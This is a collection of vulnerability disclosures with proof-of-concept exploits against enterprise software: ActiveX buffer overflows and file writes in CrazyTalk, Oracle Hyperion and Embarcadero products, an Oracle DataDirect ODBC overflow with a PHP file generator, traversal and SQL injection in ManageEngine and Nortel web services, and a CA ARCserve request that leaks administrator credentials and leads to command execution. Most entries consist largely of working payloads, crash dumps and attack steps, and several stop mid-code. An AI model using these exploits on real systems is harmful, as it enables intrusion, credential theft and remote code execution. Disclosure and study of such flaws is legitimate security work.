for scripting and safe for initialization, then Internet Explorer will allow scripting of this control from remote. Vulnerability: The 'BackImage' ,'ScriptName', 'ModelName' and 'SRC' properties can be used to trigger a buffer overflow condition. The crazytalk4.ocx ActiveX control will load the close CrazyTalk4Native.dll library and, while constructing a local file path, will call sprintf() with an insufficient size. Call stack of main thread AddressStack Procedure / arguments Called from Frame 0012EE24 023D4FAB msvcrt.sprintf CrazyTal.023D4FA5 0012EE28 0012F180 s = 0012F180 0012EE2C 023F431C format = %s%s%s 0012EE30 042A2D6C %s = C:\DOCUME~1\Admin\LOCALS~1\Temp\RLTMP\~RW463\ 0012EE34 0012EF5C %s = aa 0012EE38 0012EE58 %s = 0012F164 023D601D CrazyTal.023D4F20 code, CrazyTalk4Native.dll : .. 023D4F80 85C0 test eax,eax 023D4F82 74 38je short CrazyTal.023D4FBC 023D4F84 8B9C24 2C03 mov ebx,dword ptr ss:[esp+32C] 023D4F8B 8D4424 1Clea eax,dword ptr ss:[esp+1C] 023D4F8F 8D8C24 2001 lea ecx,dword ptr ss:[esp+120] 023D4F96 50 push eax 023D4F97 81C6 443Badd esi,3B44 023D4F9D 51 push ecx 023D4F9E 56 push esi 023D4F9F 68 1C433F02 push CrazyTal.023F431C ; ASCII %s%s%s 023D4FA4 53 push ebx 023D4FA5 FF15 E4F33E02call dword ptr ds:[MSVCRT.sprintf]; msvcrt.sprintf .. As attachment, proof of concept code which overwrites EIP and SEH. Note: 0:008 lm -vm CrazyTalk4Native startendmodule name 021c 0220b000 CrazyTalk4Native (deferred) Image path: C:\PROGRA~1\COMMON~1\REALLU~1\CTPLAY~1\CrazyTalk4Native.dll Image name: CrazyTalk4Native.dll Timestamp:Thu May 17 12:13:42 2007 (464C2AD6) CheckSum: 00048AB2 ImageSize:0004B000 File version: 4.5.815.1 Product version: 4.0.0.1 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type:2.0 Dll File date:. Translations: 0409.04b0 CompanyName: C3D ProductName: CrazyTalk4 ActiveX Control Module InternalName: CrazyTalk4 OriginalFilename: CrazyTalk4.OCX ProductVersion: 4, 0, 0, 1 FileVersion: 4, 5, 815, 1 PrivateBuild: 4, 5, 815, 1 SpecialBuild: 4, 5, 815, 1 FileDescription: CrazyTalk4 Native Control Module LegalCopyright: Copyright (C) 2005 LegalTrademarks: Copyright (C) 2005 Comments: Copyright (C) 2005 proof of concept: http://retrogod.altervista.org/9sg_dell_poc_nodep.html
ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability
ManageEngine DeviceExpert 5.6 Java Server ScheduleResultViewer servlet Unauthenticated Remote Directory Traversal Vulnerability product homepage: http://www.manageengine.com/products/device-expert/ file tested: ManageEngine_DeviceExpert.exe tested against: Microsoft Windows Server 2003 r2 sp2 Description: DeviceExpert is a webbased, multi vendor network change, configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices. Trusted by thousands of network administrators around the world, DeviceExpert helps automate and take total control of the entire life cycle of device configuration management. [..] Background: The mentioned product installs a Java application server which listen by default on port 6060 (https) for incoming connections. Vulnerability: Without prior authentication, is possible to invoke the ScheduleResultViewer servlet to disclose every file on target system. This can be done through the FileName argument which suffers of a directory traversal vulnerability. examples: https://[host]:6060/scheduleresult.de/?FileName=conf\Authentication\auth-conf.xml https://[host]:6060/scheduleresult.de/?FileName=..\..\..\..\..\..\..\..\..\..\boot.ini auth-conf.xml stores the authentication credentials to the administrative interface (username, hashed password and a salt). It is also possible to backup the MySQL database tables by cycling through subfolders. Theese tables can contain also usernames and passwords of the configured devices, remember the software functionality, it supports multiple vendors devices from the following list: .. Cisco, HP, Nortel, Juniper, Force10, 3Com, D-link, Foundry, Dell, Aruba, Extreme, ADTRAN, Enterasys, Huawei, Blue Coat, Proxim, NetScreen, NETGEAR, FortiNet, ALAXALA, Brocade, Radware, DAX, H3C, Yamaha, Vanguard, Allied Telesis, Alcatel, Fujitsu, Motorola, Acme Packet, Watch Guard, Canoga Perkins .. Explaination: look at the web.xml located inside C:\ManageEngine\DeviceExpert\webapps\ncm\WEB-INF\ : .. servlet servlet-nameScheduleResultViewer/servlet-name servlet-classcom.adventnet.ncm.client.schedule.ScheduleResultViewerServlet/servlet-class /servlet servlet-mapping servlet-nameScheduleResultViewer/servlet-name url-pattern/scheduleresult.de/*/url-pattern /servlet-mapping .. now decompile ScheduleResultViewerServlet.class: .. package com.adventnet.ncm.client.schedule; import com.adventnet.ncm.util.NCMServerUtil; import java.io.*; import java.util.logging.Level; import java.util.logging.Logger; import javax.servlet.ServletException; import javax.servlet.http.*; public class ScheduleResultViewerServlet extends HttpServlet { public ScheduleResultViewerServlet() { logger = Logger.getLogger(com/adventnet/ncm/client/schedule/ScheduleResultViewerServlet.getName()); } public void service(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { FileInputStream in; OutputStream out; in = null; out = null; try { String fileName = request.getParameter(FileName); //-- if(fileName.endsWith(.pdf)) { response.reset(); response.setContentType(application/pdf;charset=utf-8); } else { response.setContentType(text/html;charset=utf-8); } File file = new File((new StringBuilder()).append(NCMServerUtil.SERVER_HOME).append(FS).append(fileName).toString()); //--- response.setContentLength((int)file.length()); in = new FileInputStream(file); out = response.getOutputStream(); //- byte buf[] = new byte[1024]; for(int count = 0; (count = in.read(buf)) = 0;) out.write(buf, 0, count); //- } catch(Exception ex) { logger.log(Level.SEVERE, Exception while processing request in ScheduleResultViewerServlet, ex); throw new ServletException(ex); } if(in != null) in.close(); if(out != null) out.close(); break MISSING_BLOCK_LABEL_221; Exception exception; exception; if(in != null) in.close(); if(out != null) out.close(); throw exception; } Logger logger; private static final String FS = System.getProperty(file.separator); } 'FileName' is taken from the request parameter without sanitization then is passed to the File object. File content is showed to the remote user. I think this is a huge vulnerability because this could open the path to the equipments of an entire network. As attachment, proof of concept code, which backup the underlying Mysql database. You could also choose
Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution Vulnerability
Oracle Hyperion Financial Management TList6 ActiveX Control Remote Code Execution Vulnerability tested against: Internet Explorer 8 Microsoft Windows Server 2003 r2 sp2 download url: http://www.oracle.com/technetwork/middleware/epm/downloads/index.html files tested: SystemInstaller-11121-win32.zip FoundationServices-11121-win32-Part1.zip FoundationServices-11121-win32-Part2.zip FoundationServices-11121-win32-Part3.zip FoundationServices-11121-win32-Part4.zip FoundationServices-11121-Part5.zip FoundationServices-11121-Part6.zip FoundationServices-11121-Part7.zip StaticContent-11121.zip RandAFoundation-11121.zip EPM_Architect-11121.zip HyperionFinancialManagement-11121.zip Background: the mentioned program installs an ActiveX control with the following settings: Binary Path: C:\WINDOWS\system32\TList6.ocx ProgID: TList.TList.6 CLSID: {65996200-3B87-11D4-A21F-00E029189826} Safe for Initialization (Registry): True Safe for Scripting (Registry): True This control is marked safe for scripting and safe for initialization, Internet Explorer will allows scripting of this control. Vulnerability: The mentioned class contains the vulnerable SaveData() method, see typelib: .. /* DISPID=167 */ /* VT_I2 [2] */ function SaveData( /* VT_BSTR [8] */ $lpszFileName ) { } .. which allows to create / overwrite files with arbitrary extensions inside arbitrary locations ex. automatic startup folders. By manipulating ex. the Caption property is possible to create a valid application with .hta extension. The resulting file will look like this: 00 62 99 65 87 3b d4 11 a2 1f 00 e0 29 18 98 26 .be;Ô. ¢..à). 0010 09 00 06 00 ac 14 00 00 ac 14 00 00 e4 00 00 00 ¬... ¬...ä... 0020 00 03 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 ..Rã.Î .ã.ª.K¸ 0030 51 01 00 00 00 90 01 c0 d4 01 00 0f 54 69 6d 65 Q.À Ô...Time 0040 73 20 4e 65 77 20 52 6f 6d 61 6e 01 00 01 01 00 s New Ro man. 0050 08 00 00 80 05 00 00 80 0e 00 00 80 0d 00 00 80 ...... ...... 0060 2c 01 00 00 e1 00 00 00 e1 00 00 00 f1 ff ff ff ,...á... á...ñÿÿÿ 0070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0080 00 00 00 00 00 00 00 00 01 5c 61 3e 3e 3e 3e 3e .\a 0090 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3e 3c 53 43 52SCR 00a0 49 50 54 3e 20 76 61 72 20 78 3d 6e 65 77 20 41 IPT var x=new A 00b0 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 57 53 ctiveXOb ject(WS 00c0 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 3b 20 78 cript.Sh ell); x 00d0 2e 45 78 65 63 28 22 43 41 4c 43 2e 45 58 45 22 .Exec(C ALC.EXE 00e0 29 3b 20 3c 2f 53 43 52 49 50 54 3e 00 01 01 01 ); /SCR IPT 00f0 03 00 ff ff ff ff ff ff ff ff 00 01 00 01 00 00 ..ÿÿ ÿÿ.. 0100 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 0110 01 00 00 00 00 00 03 00 01 00 00 00 ff 00 00 00 ÿ... 0120 00 00 00 08 00 00 80 01 00 00 00 00 00 00 00 00 ... 0130 00 17 00 00 80 18 00 00 80 00 00 00 00 01 00 1a ... ... 0140 62 99 65 87 3b d4 11 a2 1f 00 e0 29 18 98 26 44 be;Ô.¢ ..à).D 0150 55 02 00 00 00 12 00 06 00 0b 00 02 00 00 00 00 U... 0160 00 00 04 00 03 00 00 60 ab 4e 06 10 00 00 00 5f ...` «N._ 0170 5f 4f 62 73 6f 6c 65 74 65 56 61 6c 75 65 00 00 _Obsolet eValue.. 0180 00 00 00 00 00 00 00 00 60 ab 4e 06 00 00 00 00 `«N. 0190 01 4d 4b 10 00 00 00 00 00 01 00 00 00 02 00 00 .MK. 01a0 00 03 00 00 00 04 00 00 00 05 00 00 00 06 00 00 01b0 00 07 00 00 00 08 00 00 00 09 00 00 00 0a 00 00 01c0 00 0b 00 00 00 0c 00 00 00 0d 00 00 00 0e 00 00 01d0 00 0f 00 00 00 00 00 ff 00 00 ff ff ff 00 00 00 ...ÿ ..ÿÿÿ... 01e0 ff 00 00 00 00 00 00 05 00 00 00 02 00 00 00 00 ÿ... 01f0 00 01 00 00 c0 c0 c0 22 00 00 08 00 00 00 09 00 ÀÀÀ 0200 01 00 00 80 bf ff 31 00 00 00 8a e3 aa 2b 84 ee ...¿ÿ1. ..ãª+î 0210 e5 a0 2b 84 a8 ac a0 0c 00 00 00 35 35 32 58 58 å +¨¬ . ...552XX 0220 58 58 58 44 45 4d 4f 08 00 00 00 4a 6f 68 6e 20 XXXDEMO. ...John 0230 44 6f 65 1e 00 01 00 00 00 00 40 00 00 ff ff ff Doe. ..@..ÿÿÿ 0240 00 90 01 00 00 02 00 d7 00 00 00 44 55 06 00 00 ..× ...DU... 0250 00 12 00 06 00 0b 00 06 00 00 00 f8 8f 50 04 10 ...øP.. 0260 00 00 00 5f 5f 49 6e 6e 65 72 50 69 63 41 6c 69 ...__Inn erPicAli 0270 67 6e 00 03 00 05 00 00 00 00 10 58 66 04 13 00 gn.. ...Xf... 0280 00 00 5f 5f 49 6e 6e 65 72 42 6f 72 64 65 72 43 ..__Inne rBorderC 0290 6f 6c 6f 72 00 03 00 00 00 00 00 00 20 b5 56 08 olor µV. 02a0 13 00 00 00 5f 5f 49 6e 6e 65 72 42 6f 72 64 65 __In nerBorde 02b0 72 53 74 79 6c 65 00 03 00 00 00 00 00 00 30 f4 rStyle.. ..0ô 02c0 60 08 11 00 00 00 5f 5f 49 6e 6e 65 72 42 61 63 `.__ InnerBac
Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC (*.oce)
?php /* Oracle DataDirect ODBC Drivers HOST Attribute arsqls24.dll Stack Based Buffer Overflow PoC (*.oce) by rgod found a local vector for this: http://retrogod.altervista.org/9sg_oracle_datadirect.htm http://www.exploit-db.com/exploits/18007/ This poc will create a suntzu.oce file which should work against Hyperion Interactive Reporting Studio which is delivered with Oracle Hyperion Suite. When clicked a login box appears, on clicking OK an error message also appears then error then... boom! description for .oce : Interactive Reporting database connection file file association: C:\Oracle\Middleware3\EPMSystem11R1\products\biplus\\bin\\brioqry.exe %1 crash dump, eip and seh overwritten, unicode expanded, I suppose one should be able to deal with it : (208.152c): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=008b ebx= ecx=0e752eb8 edx=0f49 esi=0e6b3d60 edi=0012a338 eip=00410043 esp=0012a2d8 ebp=0012a2ec iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010286 brioqry+0x10043: 00410043 0152ff add dword ptr [edx-1],edx ds:0023:0f48= 0:000 g (208.152c): Access violation - code c005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=008b ebx= ecx=00410041 edx=7c8285f6 esi= edi= eip=00410043 esp=00129f10 ebp=00129f30 iopl=0 nv up ei ng nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=00010286 brioqry+0x10043: 00410043 0152ff add dword ptr [edx-1],edx ds:0023:7c8285f5=244c8b00 */ function _x($x){ global $buff; list($x) = array_values(unpack('V', $x)); $x = $x + strlen($buff); $x = pack('V',$x); return $x; } $buff = mydatabase.com. str_repeat(\x20,16). //cosmetics, no ... inside the login box str_repeat(\x41,4000); //$dsn=DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;; //$dsn=DRIVER=DataDirect 6.0 MySQL Wire Protocol;HOST=;IP=127.0.0.1;PORT=9;DB=DATA;UID=sa;PWD=null; $dsn=DRIVER=DataDirect 6.0 PostgreSQL Wire Protocol;HOST=;UID=system;PWD=X;; while (!(strlen($dsn)==166)){ //fill the gap $dsn.=\x20; } $dsn=str_replace(HOST=;,HOST=.$buff.;,$dsn); $dump= #BRIF\x20BIN001. \x00\x00\x00\x00. _x(\x7b\x07\x00\x00). //header length, increase counter \x37\x00\x00\x00. //path length D:\\Documents\x20and\x20Settings\\Admin\\Desktop\\Predefinito.oce. \x01\x00\x01\x00. \x00\x00\x07\x00. \x00\x00\x0a\x00. \x00\x00. _x(\xa6\x00\x00\x00). //dsn length $dsn. \x00\x00\x00\x00. \x00\x00\x00\x00. \x04\x00\x00\x00. True. \x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x01\x00\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00@\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x04\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\r\x00\x00\x00. ColItem.Table. \x01\x00. \x00\x00\x04\x00\x00\x00\x12\x00\x00\x00. ColItem.TableAlias. \x01\x00\x00\x00\x10\x00. \x00\x00\r\x00\x00\x00. ColItem.Owner. \x01\x00\x00\x00\x1c\x00\x00\x00\x0c\x00\x00. \x00. ColItem.Type. \x01\x00\x00\x00(\x00\x00\x00\x03\x00\x00\x00\x06\x00\x00\x00. Source. \x01\x00\x00\x00\x05\x00\x00\x004\x00\x00\x00\x05\x00\x00\x00. Where. \x01. \x00\x00\x00\x05\x00\x00\x008\x00\x00\x00\x07\x00\x00\x00. OrderBy. \x01\x00. \x00\x00\x05\x00\x00\x00\x00\x00\x00|\x00\x00\x00\x04\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00. \x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00. \x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00. \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00. \x00\x00\x00\x00\x09\x00\x00\x00\x0c\x00\x00\x00ColItem.Name\x01\x00\x00\x00. \x04\x00\x00\x00\x10\x00\x00\x00. ColItem.ColAlias. \x01\x00\x00\x00\x10\x00\x00\x00. \x0e\x00\x00\x00. ColItem.ColNum. \x01\x00\x00\x00\x1c\x00\x00\x00\x0f\x00\x00\x00. ColItem.ColType. \x01\x00\x00\x00(\x00\x00\x00\x10\x00\x00\x00. ColItem.NumBytes. \x01\x00\x00\x004\x00. \x00\x00\x0e\x00\x00\x00. ColItem.Places. \x01\x00\x00\x00@\x00\x00\x00\x0e\x00\x00. \x00. ColItem.Digits. \x01\x00\x00\x00L\x00\x00\x00\r\x00\x00\x00. ColItem.Nulls. \x01\x00\x00\x00X\x00. \x00\x00\x12\x00\x00\x00. ColItem.NativeType.
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability tested against: Microsoft Windows 2k3 r2 sp2 Oracle Hyperion Performance Management and BI (v11.1.2.1.0) download url of the Oracle Hyperion suite: http://www.oracle.com/technetwork/middleware/epm/downloads/index.html files tested: SystemInstaller-11121-win32.zip FoundationServices-11121-win32-Part1.zip FoundationServices-11121-win32-Part2.zip FoundationServices-11121-win32-Part3.zip FoundationServices-11121-win32-Part4.zip FoundationServices-11121-Part5.zip FoundationServices-11121-Part6.zip FoundationServices-11121-Part7.zip StaticContent-11121.zip RandAFoundation-11121.zip EPM_Architect-11121.zip Vulnerability: The mentioned product installs various drivers to allow the software to get informations from ODBC data sources. Some of them are vulnerable to a remote stack based buffer overflow which can be triggered by specifying an overlong HOST attribute inside the connection string. The software tries to do an unicode/ASCII conversion. In doing this, the stack is completely smashed allowing to redirect the execution flow to an user supplied buffer. Analysis for (*) and errata corrige, too many nights awake : When receiveng the attribute, arsqls24.dll does an unicode/ASCII conversion; this fragment of code counts the number of bytes needed and store it in eax .. 01D45C10 83C1 02 add ecx,2 01D45C13 83C0 01 add eax,1 01D45C16 66:8339 00 cmp word ptr ds:[ecx],0 01D45C1A ^75 F4jnz short ARSQLS24.01D45C10 .. the next operation is a copy loop which moves the needed bytes to a memory region pointed by ecx, trusting the eax counter. .. 01D48C36 8A16 mov dl,byte ptr ds:[esi] 01D48C38 83E8 01 sub eax,1 01D48C3B 8811 mov byte ptr ds:[ecx],dl 01D48C3D 83C1 01 add ecx,1 01D48C40 83C6 02 add esi,2 01D48C43 85C0 test eax,eax 01D48C45 ^75 EFjnz short ARSQLS24.01D48C36 .. The memory region pointed by ecx is adjacent to critical structures (stack pointers), so when the HOST attribute is an overlong string the stack is partially overwritten with user supplied values. The result, after a few steps: EAX ECX 0003 EDX 02B52E88 EBX 0013C720 ASCII AA ESP 0013C720 ASCII AA EBP 0013D1A4 ESI 02B56FF8 EDI 0001 EIP 41414141 C 0 ES 0023 32bit 0() P 1 CS 001B 32bit 0() A 0 SS 0023 32bit 0() Z 0 DS 0023 32bit 0() S 0 FS 003B 32bit 7FFDF000(FFF) T 0 GS NULL D 0 O 0 LastErr WSAHOST_NOT_FOUND (2AF9) EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G) MM0 MM1 MM2 MM3 MM4 MM5 MM6 8000 MM7 FEE0 poc: The underlying operating system contains the ADODB Connection ActiveX control which is marked safe for initialization and safe for scripting (implements the IObjectSafety interface) which could allow a remote attacker to specify the mentioned connection string. The IE security settings do not allow to open a connection from another domain but this can be used in conjuntion with a XSS vulnerabilty, connection string pollution or SQL injection vulnerabilities or through specific configuration files. Note also that I am mentioning the ADODB object for pure commodity: when installed, the ODBC drivers are availiable systemwide, so this is a good basis for remote privilege elevations of many kinds. Note that Internet Explorer does not crash when trying to execute EIP, attach a tool like faultmon to the IE sub-process. (*) !-- saved from url=(0014)about:internet -- script var obj = new ActiveXObject(ADODB.Connection); x=; for (i=0;i666;i++){x = x + } obj.ConnectionString =DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST= + x + ;IP=127.0.0.1;PORT=9;DB=xx;UID=sa;PWD=null; obj.Open(); /script !-- saved from url=(0014)about:internet -- script var obj = new ActiveXObject(ADODB.Connection); x=; for (i=0;i1666;i++){x = x + } obj.ConnectionString =DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST= + x + ;IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null; obj.Open(); /script !-- saved from url=(0014)about:internet -- script var obj = new ActiveXObject(ADODB.Connection); x=; for (i=0;i1666;i++){x = x + } obj.ConnectionString =DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST= + x +
Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration getSubKeys() Remote SQL Injection Exploit
?php /* Nortel Contact Recording Centralized Archive 6.5.1 EyrAPIConfiguration Web Service getSubKeys() Remote SQL Injection Exploit tested against: Microsoft Windows Server 2003 r2 sp2 Microsoft SQL Server 2005 Express download uri: ftp://ftp.avaya.com/incoming/Up1cku9/tsoweb/web1/software/c/contactcenter/crqm/6_5_CS1K_2/Nortel-DVD3-Archive-6_5.iso background: This software installs a Tomcat http server which listens on port 8080 for incoming connections. It exposes the following servlet as declared inside c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\web.xml : .. servlet-mapping servlet-nameEyrAPIConfiguration/servlet-name url-pattern/EyrAPIConfiguration/*/url-pattern /servlet-mapping .. at the following url: http://[host]:8080/EyrAPI/EyrAPIConfiguration/EyrAPIConfigurationIf Vulnerability: without prior authentication, you can reach a web service with various methods availiable, as described inside the associated wsdl, see file: c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\EyrAPIConfiguration.wsdl among them, the getSubKeys() method. Now look at getSubKeys() inside the decompiled c:\Program Files\[choosen folder]\Tomcat5\webapps\EyrAPI\WEB-INF\classes\com\eyretel\eyrapi\EyrAPIConfigurationImpl.class : .. public String getSubKeys(boolean iterateSubKeys, boolean includeValues, String systemId, String componentId, String sysCompId, String userName) throws RemoteException { StringBuffer xml; ConfigOwnerId configOwnerId; Connection conn; PreparedStatement pStmt; ResultSet rs; PreparedStatement pStmt2; ResultSet rs2; log.info((new StringBuilder()).append(Request getSubKeys: iterateSubKeys=).append(iterateSubKeys).append(, includeValues=).append(includeValues).append(, SystemId=).append(systemId).append(, componentId=).append(componentId).append(, sysCompId=).append(sysCompId).append(, userName=).append(userName).toString()); xml = new StringBuffer(ConfigurationNodeList); configOwnerId = null; conn = null; pStmt = null; rs = null; pStmt2 = null; rs2 = null; try { conn = SiteDatabase.getInstance().getConnection(); if(EyrAPIProperties.getInstance().getProperty(database, MSSQLServer).equalsIgnoreCase(Oracle)) { if(componentId.compareToIgnoreCase() == 0) componentId = *; if(systemId.compareToIgnoreCase() == 0) systemId = *; if(sysCompId.compareToIgnoreCase() == 0) sysCompId = *; if(userName.compareToIgnoreCase() == 0) userName = *; pStmt = conn.prepareStatement((new StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE nvl(ComponentID, '*') = ').append(componentId).append(' AND ).append(nvl(SystemID, '*') = ').append(systemId).append(' AND ).append(nvl(SysCompID, '*') = ').append(sysCompId).append(' AND ).append(nvl(UserName, '*') = ').append(userName).append(').toString()); rs = pStmt.executeQuery(); } else { pStmt = conn.prepareStatement((new StringBuilder()).append(SELECT ConfigOwnerID FROM ConfigOwnerView WHERE ISNULL(CONVERT(varchar(36), ComponentID), '') = ').append(unpunctuate(componentId)).append(' AND ).append(ISNULL(CONVERT(varchar(36), SystemID), '') = ').append(unpunctuate(systemId)).append(' AND ).append(ISNULL(CONVERT(varchar(36), SysCompID), '') = ').append(unpunctuate(sysCompId)).append(' AND ).append(ISNULL(UserName, '') = ').append(unpunctuate(userName)).append(').toString()); rs = pStmt.executeQuery(); } if(rs.next()) { String strConfigOwnerId = rs.getString(1); if(!rs.wasNull()) configOwnerId = new ConfigOwnerId(strConfigOwnerId); pStmt2 = conn.prepareStatement((new StringBuilder()).append(SELECT ConfigGroupID, ConfigGroupName FROM ConfigGroupView WHERE ConfigOwnerID = ').append(configOwnerId.toString()).append(').toString()); for(rs2 = pStmt2.executeQuery(); rs2.next(); xml.append(getSubKeyValuesInc(new Integer(rs2.getInt(1)), iterateSubKeys, includeValues))); } } catch(SQLException e) { String msg = Unable to get subkeys; log.error(msg, e); throw new RemoteException(msg, e); } catch(GenericDatabaseException e) { String msg = Unable to get subkeys; log.error(msg, e); throw new RemoteException(msg, e); } DbHelper.closeStatement(log, pStmt); DbHelper.closeResultSet(log, rs); DbHelper.closeStatement(log, pStmt2); DbHelper.closeResultSet(log, rs2);
Embarcadero ER/Studio XE2 Server Portal Tom Sawyer's Default GET Extension Factory ActiveX Control Remote Code Execution
See: CVE-2011-2217 reference url: http://www.securityfocus.com/bid/48099 The mentioned product is vulnerable to the same issue. download url: https://downloads.embarcadero.com/free/er_studio_portal ActiveX settings: ProgID: TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1 CLSID: {658ED6E7-0DA1-4ADD-B2FB-095F08091118} Binary path: D:\Program Files\Embarcadero\ERStudioPortal1.6\PortalIntf\tsgetx71ex553.dll Safe for scripting (registry): true Safe for initialize (registry): true poc: script var obj = new ActiveXObject(TomSawyer.DefaultExtFactory.5.5.3.238.VS7.1); /script then the dll will try to call inside an unitialized memory region which is reachable by an attacker through heap spray. //rgod
CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution
?php /* CA ARCserve D2D r15 GWT RPC Request Auth Bypass / Credentials Disclosure and Commands Execution PoC product homepage: http://arcserve.com/us/default.aspx file tested: CA_ARCserve_D2D_Setup_BMR.zip tested against: Microsoft Windows Server 2003 r2 sp2 This software installs a Tomcat HTTP server which listens on port 8014 for incoming connections (this port is also added automatically to firewall exceptions to exhacerbate the vulnerability I am going to describe). It uses a GWT RPC (Google Web Toolkit Remote Procedure Call) mechanism to receive messages from the Administrator browser. Without prior authentication, a remote user with access to the web server can send a POST request to the homepageServlet serlvet containing the getLocalHost message and the correct filename of a certain descriptor to disclose the username and password of the target application. This username and password pair are Windows credentials with Administrator privileges, requested during the ARCserve installation process (it clearly says this, an user from the Administrators group). This works with the mentioned software perfectly installed and configured and after the Administrator user logged in *one time each Tomcat session, logged out or not* (which I think is easily exploitable against a production service running twenty four hours a day). You could also choose to resend the request indefinetely, waiting for the Administrator to be logged in. Example packet: POST /contents/service/homepage HTTP/1.1 Content-Type: text/x-gwt-rpc; charset=utf-8 User-Agent: GoogleBot/2.1 Host: 192.168.0.1:8014 Content-Length: 149 Connection: Keep-Alive Cache-Control: no-cache Cookie: donotshowgettingstarted=%7B%22state%22%3Atrue%7D 5|0|4|http://192.168.0.1:8014/contents/|2C6B33BED38F825C48AE73C093241510|com.ca.arcflash.ui.client.homepage.HomepageService|getLocalHost|1|2|3|4|0| Note that '2C6B33BED38F825C48AE73C093241510' is a static value which represents a filename of a gwt rpc descriptor which can be found inside the default path: C:\Program Files\CA\ARCserve D2D\TOMCAT\webapps\ROOT\contents\2C6B33BED38F825C48AE73C093241510.gwt.rpc Note also that this packet does not contain any session id. Response packet: HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Disposition: attachment Content-Type: application/json;charset=utf-8 Content-Length: 480 Date: Wed, 13 Jul 2011 18:57:19 GMT //OK[0,17,16,8,15,14,8,13,-3,12,11,8,10,9,8,7,0,6,5,0,4,3,8,2,1,1,[com.ca.arcflash.ui.client.model.TrustHostModel/1126245943, com.extjs.gxt.ui.client.data.RpcMap/3441186752,port,java.lang.Integer/3438268394,Selected,java.lang.Boolean/476441737, hostName,java.lang.String/2004016611,RGOD_9SG,uuid,1a580961-1aa7-4225-b3aa-a522649c16ec,type, user,Administrator,password,MY_PASSWORD,Protocol],0,5] Clear text! Clear text!!! Username - Administrator Password - MY_PASSWORD A remote attacker could then login to the affected application then execute arbitrary commands with Administrator group privileges in the following way: Browse Backup settings; Click Advanced tab; Check Run a command before backup is started; Fill the white field with the desired command, ex. cmd /c start calc ; Fill the credentials fields with the gained username and password (you can use the same you had before); Select an existing backup destination in the Protection Settings tab; Browse to the main page and clicking Backup Now; Select Incremental Backup and press OK; calc.exe is launched various times. Other attacks are possible. Vulnerable code and explaination: web.xml : .. servlet servlet-namehomepageServlet/servlet-name servlet-classcom.ca.arcflash.ui.server.HomepageServiceImpl/servlet-class load-on-startup1/load-on-startup /servlet servlet-mapping servlet-namehomepageServlet/servlet-name url-pattern/contents/service/homepage/url-pattern /servlet-mapping .. the decompiled HomepageServiceImpl.class : .. public TrustHostModel getLocalHost() throws BusinessLogicException, ServiceConnectException, ServiceInternalException { try { TrustedHost trustedhost = getLocalWebServiceClient().getLocalHostAsTrust(); TrustHostModel trusthostmodel = ConvertToModel(trustedhost); return trusthostmodel; } catch(AxisFault axisfault) { axisfault.printStackTrace(); } return null; } .. the decompiled WebServiceClient.class : .. public TrustedHost getLocalHostAsTrust() throws AxisFault { Object aobj[] = invokeWebMethod(getLocalHostAsTrust, new Object[0], new Class[] { // com/ca/arcflash/webservice/data/TrustedHost }); return 